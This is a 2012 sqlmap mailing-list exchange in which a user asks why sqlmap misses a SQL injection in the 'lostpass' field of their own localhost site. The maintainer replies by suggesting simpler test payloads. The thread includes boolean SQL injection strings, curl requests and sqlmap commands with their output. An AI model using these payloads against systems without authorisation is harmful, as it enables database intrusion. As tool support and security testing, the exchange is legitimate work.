Re: [sqlmap-users] sqlmap wont find an "AND boolean/time" based sqli
From: Miroslav S. <mir...@gm...> - 2012-01-07 16:24:42
Hi.

This looks strange:

1'%20OR 1=1 AND 1='1
and
1' OR 1=1 AND 1='2

Could you please try to find the simplest vectors/payloads that work, e.g.:

1' AND '1'='1
1' AND '1'='2

From these payloads I am not sure why there is OR 1=1 and how this is evaluated to True or False (as OR 1=1 should evaluate in normal cases to True in both vectors you've sent).

Kind regards

On Sat, Jan 7, 2012 at 5:10 PM, cats <du...@al...> wrote:
> Ok so I know that my site has an sqli (and boolean/mysql time based).
> I even tried both of them myself and the results are very clear and
> simple, yet sqlmap doesn't seem to see it. It can find the time based at
> first, but it always ends up saying that it's a false positive.
>
> cURL will give me the following result from the page, using "and boolean
> based sqli" with a true statement:
>
> curl --data "lostpass=1'%20OR 1=1 AND 1='1"
> http://localhost/account/index.php
>
> <div class='message' style='padding:10px;'>Your password was e-mailed to
> 1' OR 1='1</div>
>
>
> And now a false one
>
> curl --data "lostpass=1' OR 1=1 AND 1='2"
> http://localhost/account/index.php
>
>
> <td class='message'>The email address you entered 1' OR 1=1 AND 1='2
> does not exist</p>
>
>
> I have tried with --string and --text-only with sqlmap, but I get the
> same results over and over. Here's some sample output:
>
> python sqlmap.py -u "http://localhost/account/index.php" --random-agent
> --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to"
> --text-only --delay=5 --technique=TB
>
>
> [16:57:34] [INFO] testing connection to the target url
> [16:57:49] [INFO] heuristics detected web page charset 'ascii'
> [16:57:50] [INFO] testing if the provided string is within the target
> URL page content
> [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
> [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
> [16:58:13] [INFO] POST parameter 'lostpass' is dynamic
> [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass'
> might not be injectable
> [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
> [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND
> time-based blind' injectable
> [17:00:48] [INFO] checking if the injection point on POST parameter
> 'lostpass' is a false positive
> [17:03:09] [WARNING] false positive injection point detected
> [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
> [17:03:09] [CRITICAL] all parameters appear to be not injectable.
>
> I tried with a sleep(5) injection manually as well, and it works like a
> charm. Any ideas?

--
Miroslav Stampar
http://about.me/stamparm